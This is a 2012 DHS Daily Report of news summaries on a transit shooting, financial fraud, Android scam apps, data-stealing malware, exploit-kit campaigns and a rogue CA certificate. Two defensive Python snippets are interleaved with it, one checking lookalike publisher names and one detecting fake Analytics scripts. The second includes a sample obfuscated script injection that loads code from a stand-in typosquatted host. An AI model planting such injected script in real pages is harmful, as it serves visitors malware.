Thursday, February 9, 2012

Complete DHS Daily Report for February 9, 2012

Daily Report

Top Stories

• A shooting suspect shot three people, killing one, at a Dallas Area Rapid Transit bus station before he was shot and killed by police. – CNN (See item 14)

14. February 8, CNN – (Texas) Suspect, victim die in Texas transit shooting. A shooting suspect and one of three people he shot at a Dallas Area Rapid Transit (DART) station just north of Dallas have died of their wounds, officials said. The shootings happened February 7 at the Arapaho station in Richardson, Texas, a DART spokesman said. “A DART female officer had been alerted by a bus operator about an issue with a customer, so she went to the station to meet the bus,” he said. “Meanwhile, a second bus pulled into the station and that operator also indicated they had someone attempting to board the bus that was being unruly. The suspect got off the bus and started walking towards the train station. When our officer approached him, he started firing.” The DART officer received non-life-threatening gunshots to her bulletproof vest and her arm. Two male passengers also were shot. One later died. A Richardson police spokesman said during a news conference that it was unclear if the victims were hit by crossfire or were targeted by the gunman. Several dozen people were evacuated from the DART station. Source:

• Symantec confirmed February 7 the pcAnywhere source code published on the Web February 6 by hackers who tried to extort $50,000 from the company was legitimate, and said it expected the rest of the code stolen in 2006 to be made public. – Computerworld. See item 35 below in the Information Technology Sector.


Banking and Finance Sector

11. February 8, Pittsburgh Post-Gazette – (Pennsylvania) Police unsure why driver crashed through doors of PNC’s Firstside Center. Police in Pittsburgh continued to search for the driver of a stolen sport utility vehicle (SUV) that crashed into a PNC Bank branch February 7, drawing a bomb squad. The man drove the vehicle onto the steps of the building and into its glass front doors about 2 p.m., police said. Witnesses said the suspect ran away, possibly darting into a nearby building. The commotion prompted police to clear and cordon off a 3-block stretch for more than 2 hours while a bomb squad examined the vehicle with a robot. Bomb technicians found no explosives. Many people inside the building did not leave, but moved to rooms in the back. Police are still investigating a motive. A police commander said his detectives did not know if the crash was an accident or if the bank was targeted. The SUV was apparently stolen earlier in the day from the Parkway Center Mall in Green Tree, the commander said. Source:

12. February 8, San Francisco Chronicle – (California) Plea deals made in Calif. mortgage scheme. Four defendants have pleaded guilty to charges related to a mortgage loan scheme that involved at least 20 northern Californian properties and lined the defendants’ pockets with more than $20 million, federal investigators announced February 8. Through an arrangement with two real estate agents that lasted from 2002 to 2007, a couple secured 63 loans on properties purchased through straw buyers, court documents said. The couple also admitted to owning and operating numerous residential care facilities that employed illegal immigrants. The California Department of Social Services barred the couple from operating care facilities in 1998 because of licensing violations, but the couple continued to operate the facilities by using buyers paid to purchase the properties and then sign grant deeds that transferred title to the wife, court documents said. The couple pleaded guilty to charges of bank fraud, tax evasion, and harboring illegal aliens, and are responsible for $5.2 million in restitution. A real estate agent, who pleaded guilty to charges of bank fraud and monetary transactions using criminally derived property, is responsible for $2.8 million of that sum. Prosecutors said the other agent will have to pay about $300,000. The maximum sentence for bank fraud is 30 years in prison and a $1 million fine. Source:

13. February 7, Detroit Free Press – (Michigan; International) Man held on Ponzi scheme charges. An Iraqi citizen and former Dearborn, Michigan resident is in custody on federal charges he operated a Ponzi scheme that allegedly bilked investors, mostly Iraqi-Americans, out of $58 million, the U.S. attorney’s office said February 6. Authorities said the man promised big returns on rebuilding projects in Iraq, but instead used investors’ money to repay earlier investors. He fled to the Middle East after investors discovered the scheme. More than 100 sued him in federal court in Detroit in 2010. The U.S. attorney’s office said he was arrested at Detroit Metro Airport February 3. Source:

For another story, see item 33 below in the Information Technology Sector.

Information Technology

30. February 8, Help Net Security – (International) More bogus ad-serving Android apps evade Google’s Bouncer. Users searching for games on the official Android Market have been heavily targeted by ad-pushing scammers lately. First it was the fake Temple Run app, and now a string of bogus copies of popular iPhone games supposedly developed by Rovio Mobile Ltd, the developers of the famous Angry Birds game. Some of these games are offered by other developers — mostly on Apple’s iPhone Apps Store — and some do not even exist, but the scammers are trying to take advantage of the fact that Angry Birds’ developer Rovio has become a well-known and trusted name. The scammers were able to register their account under “Rovio Mobile” by using a capital “I” instead of a lowercase “L” in “Mobile,” and the result is a legitimate-looking account name. Once the user tries to install any of the apps, she is faced with an image taken from the original app and instructions to follow a link to complete the process and to unlock the “full version.” However, the link leads to a Web page hosting advertisements for diet pills, and entices the users to sign in to find out how they can get three bottles of pills for free. Source:
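The capital-I-for-lowercase-L trick in item 30 is a homoglyph attack on a publisher name. The following check, an added example that is not code from the report or from any vendor, reduces a developer name to a confusable-insensitive “skeleton” and flags names that collapse onto a trusted publisher without matching it exactly; the lookalike table is a constructed subset, not the full Unicode confusables list.

```python
import unicodedata

# Constructed lookalike table (assumption: enough for Latin/digit swaps seen in
# publisher-name spoofing; not the full Unicode confusables list).
_SINGLE = {
    "I": "l", "1": "l", "|": "l",      # capital i, digit one, bar read as lowercase L
    "0": "o", "O": "o",                # zero and capital O
    "5": "s", "$": "s",
    # Cyrillic letters that render like Latin ones
    "а": "a", "е": "e", "о": "o", "р": "p", "с": "c", "х": "x",
}
_MULTI = [("rn", "m"), ("vv", "w")]    # glyph pairs that read as one letter


def skeleton(name: str) -> str:
    """Reduce a name to a form that ignores visually confusable glyphs.

    The single-glyph map runs *before* case folding so that a capital I becomes
    lowercase L (the swap used against "Rovio Mobile") rather than the letter i.
    """
    s = unicodedata.normalize("NFKC", name)
    s = "".join(_SINGLE.get(ch, ch) for ch in s)
    s = s.casefold()
    for pair, repl in _MULTI:
        s = s.replace(pair, repl)
    # Drop spaces and punctuation so "Rovio Mobile" and "RovioMobile" collide.
    return "".join(ch for ch in s if ch.isalnum())


def classify_publisher(candidate: str, trusted: str) -> str:
    """Return 'exact', 'lookalike' or 'different' for a developer name."""
    if candidate == trusted:
        return "exact"
    if skeleton(candidate) == skeleton(trusted):
        return "lookalike"
    return "different"


def lookalike_positions(candidate: str, trusted: str) -> list:
    """Indexes at which a same-length candidate differs from the trusted name."""
    if len(candidate) != len(trusted):
        return []
    return [i for i, (a, b) in enumerate(zip(candidate, trusted)) if a != b]
```

A store-side review queue would run `classify_publisher` against an allow-list of high-profile publishers and hold any “lookalike” registration for manual review.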

31. February 8, Softpedia – (International) Malware steals documents and uploads them to Sendspace. Security experts came across a piece of malware programmed to steal documents from the infected computer. The malicious element is designed to upload the obtained Microsoft Word and Excel files to the hosting site Sendspace. Trend Micro researchers said Sendspace was used previously to store stolen data because the service allowed crooks to “send, receive, track and share” big files, but the process had never before been automated by malware. The infection begins with an executable file called Fedex_Invoice(dot)exe, identified as TROJ_DOFOIL.GE, the file’s name hinting it may be spread with the use of a fake “FedEx failed delivery” spam campaign. Once the file is executed, it downloads and executes TSPY_SPCESEND.A, a trojan that searches the local drive for Word and Excel documents, collecting them in a password-protected archive placed in the user’s temporary folder. After the archive is created, it is uploaded to Sendspace, and its download link is transmitted to the malware’s command and control (C&C) server. This way the crooks do not have to store all the files on the C&C; instead they access them from the file hosting service. This discovery means information theft and exfiltration are not specific to targeted attacks only, but are present in mass campaigns as well. Source:

32. February 8, Threatpost – (International) Attackers using fake Google Analytics code to redirect users to Black Hole Exploit Kit. Injecting malicious code into the HTML used on legitimate Web sites is a key part of the infection lifecycle for many attack crews, and they often disguise and obfuscate their code to make it more difficult to analyze, or to make it appear to be legitimate code. The latest instance of this technique has seen attackers employing code meant to look like Google Analytics snippets that instead sends victims off to a remote site hosting the Black Hole Exploit Kit. Researchers at Websense discovered the ongoing attack recently, and found the code being used to hide the fake Google Analytics tags is heavily obfuscated, making analysis quite difficult. The malicious code, which is being injected into benign pages on legitimate sites, is designed to look just like actual Google Analytics code and to appear as though it is referring to common domains. Source:
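The tell in item 32 is a script that advertises itself as Google Analytics but loads from, or writes a tag pointing at, a host that is not Google’s. The audit below is an added example (not code from the report or from Websense): it walks a page’s script tags and flags external sources whose hostname is not a genuine Analytics host, and inline blocks that mention Analytics while leaning on obfuscation primitives. The trusted-host set reflects the ga.js include of that era; the sample page is constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts the genuine (2012-era) ga.js snippet loaded from; anything else that
# calls itself Google Analytics deserves a second look.
TRUSTED_GA_HOSTS = {"www.google-analytics.com", "ssl.google-analytics.com"}
# Primitives injected "Analytics" blocks commonly use to hide a redirect.
_OBFUSCATION = re.compile(r"\b(unescape|eval|fromCharCode)\s*\(")
_GA_MENTION = re.compile(r"google.?analyt", re.I)   # also catches typosquats


class _ScriptCollector(HTMLParser):
    """Gather external script sources and complete inline script bodies."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._buf, self._in_script = [], [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script, self._buf = True, []
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            if self._buf:
                self.inline.append("".join(self._buf))

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def audit_ga_scripts(html: str) -> dict:
    """Return script sources and inline bodies that pose as GA but are not."""
    p = _ScriptCollector()
    p.feed(html)
    bad_src = [s for s in p.srcs if _GA_MENTION.search(s)
               and (urlsplit(s).hostname or "").lower() not in TRUSTED_GA_HOSTS]
    bad_inline = [b for b in p.inline
                  if _GA_MENTION.search(b) and _OBFUSCATION.search(b)]
    return {"src": bad_src, "inline": bad_inline}


# Constructed sample: one genuine include, one subdomain-prefix look-alike,
# one obfuscated inline block that writes a typosquatted "Analytics" tag.
SAMPLE_HTML = """<html><head>
<script src="https://ssl.google-analytics.com/ga.js"></script>
<script src="//google-analytics.com.cdn-stats.example/ga.js"></script>
<script>var t=unescape('%3Cscript src=%22http://www.google-analytlcs.example/ga.js%22%3E');
document.write(t);</script>
</head><body></body></html>"""
```

Run `audit_ga_scripts` over crawled pages of a site you own; a non-empty result is a prompt to diff the page against its deployed source, not proof of compromise on its own.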

33. February 8, Softpedia – (International) Blackhole toolkit served by spam ahead of tax season. Symantec researchers came across a large number of spam messages that try to trick the recipient into clicking on a link that points to the Blackhole toolkit. More than 200 unique URLs were identified in a series of e-mails that urge users to verify their accounts after some discrepancies were supposedly identified by the sender company. The phony e-mails, apparently coming from a legitimate company, read: “With intent to assure that the exact information is being sustained on our systems, as well as to improve the quality of service we can provide to you; [COMPANY NAME] has participated in the Internal Revenue Service [IRS] Name and TIN Matching Program. We have found out, that your name and/or TIN, that we have on your account is different from the information on file with the Social Security Administration. In order to verify your account, please enter the secure section.” Once the link is clicked, the user is taken to a page containing more links that point to a JavaScript file called js.js. This file serves the Blackhole toolkit, which probes for various vulnerabilities on the victim’s computer; the final payload was identified as Trojan.Zbot. The domains that contain the malicious JavaScript file are not only newly registered domains, but also legitimate domains that were hijacked by the cybercriminals that launched the campaign. Users are advised not to click on links that come with a suspicious-looking e-mail, and also to avoid opening attachments, especially exe, zip, or pdf files. Source:

34. February 7, Computerworld – (International) Adobe sets IE as next target in Flash security work. Adobe plans to tackle Microsoft’s Internet Explorer (IE) in its ongoing work to “sandbox” its popular Flash Player within browsers, Adobe’s head of security said February 7. On February 6, Adobe released a beta version of a sandboxed Flash Player plug-in for Mozilla’s Firefox on Windows Vista and Windows 7 as a follow-up to a similar initiative in 2010 for Google’s Chrome. Next on the list is IE. “IE has a big chunk of the user base,” said Adobe’s senior director of security, products, and services. “We want to do what protects the most users the fastest.” According to Web metrics company Net Applications, IE accounted for 53 percent of all browsers used in January worldwide, more than double Firefox’s 21 percent and almost triple Chrome’s 19 percent. Adobe’s head of security declined to set a timetable for putting Flash within a sandbox inside IE. Source:

35. February 7, Computerworld – (International) Symantec expects Anonymous to publish more stolen source code. On February 7, Symantec confirmed the pcAnywhere source code published on the Web February 6 by hackers who tried to extort $50,000 from the company was legitimate. A company spokesman also said Symantec expects the rest of the source code stolen from its network in 2006 will also be made public. Symantec’s acknowledgement followed the appearance late February 6 of a 1.3GB file on various file-sharing Web sites that claimed to be the source code of the pcAnywhere remote-access software. The Anonymous hacking group claimed responsibility for posting the pcAnywhere source code. Also February 6, an individual or group going by the name “Yama Tough” published a series of e-mails on Pastebin that detailed an attempt to extort $50,000 from Symantec. Source:

36. February 7, H Security – (International) Trustwave issued a man-in-the-middle certificate. Certificate authority Trustwave issued a certificate to a company allowing it to issue valid certificates for any server. This enabled the company to listen in on encrypted traffic sent and received by its staff using services such as Google and Hotmail. Trustwave has since revoked the CA certificate and vowed to refrain from issuing such certificates in the future. According to Trustwave, the CA certificate was used in a data loss prevention (DLP) system, intended to prevent confidential information such as company secrets from escaping. The DLP system monitored encrypted connections by acting as a man-in-the-middle, meaning it tapped into the connection and fooled the browser or e-mail client into thinking it was communicating with the intended server. To prevent certificate errors, the DLP system had to be able to produce a valid certificate for each connection — the Trustwave CA certificate enabled it to issue such certificates itself, and because it chained to a publicly trusted root, every browser accepted them without complaint. Source:

Communications Sector

See items 30 and 36 above in the Information Technology Sector.